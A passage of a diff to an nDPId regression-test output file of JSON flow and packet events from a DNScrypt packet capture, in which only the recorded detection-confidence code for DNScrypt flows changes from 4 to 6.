AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":330,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317496} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":330,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAABQbtEAub0RLusKAAABLUxxHwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":331,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317496} @@ -673,55 +673,55 @@ 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":946739317829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739317829,"pkt":"ZmZmZmZmRERERERECABFAADSA+lAAC8R6AotTHEfCgAAAQG71+MAvjWuZBaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAr5zEv1WGx7jem2pK2nflqiaMVF6rzF7WHGlvrWl\/ySW6UfM8aTB84zwXL6LFGFBJtiDl\/1MLBjf7\/4+Tj2baBU4DeMBZ\/3\/bX+\/ckKf+At437jBg5+agLK3mfgxAT218TgN4wFn\/f9sAAAABX1NRj19Uow8="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAIc+3JAAL0RigEKAAABl1DeT9J0AbsCCDh2XDIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAXc+3MgAL0RpkAKAAABl1DeT7G5AbsGBKXWXC8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAXc+3QgAL0Rpj8KAAABl1DeT7pxAbsGBJ0gXC0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":341,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318038} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":341,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAABQ+3MAub0RyxMKAAABl1DeTwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":342,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318038} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":342,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAABQ+3QAub0RyxIKAAABl1DeTwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAIc+3VAAL0Rif4KAAABl1DeT8tIAbsCCDh2XDABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAXc+3YgAL0Rpj0KAAABl1DeT+EkAbsGBHZpXDEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA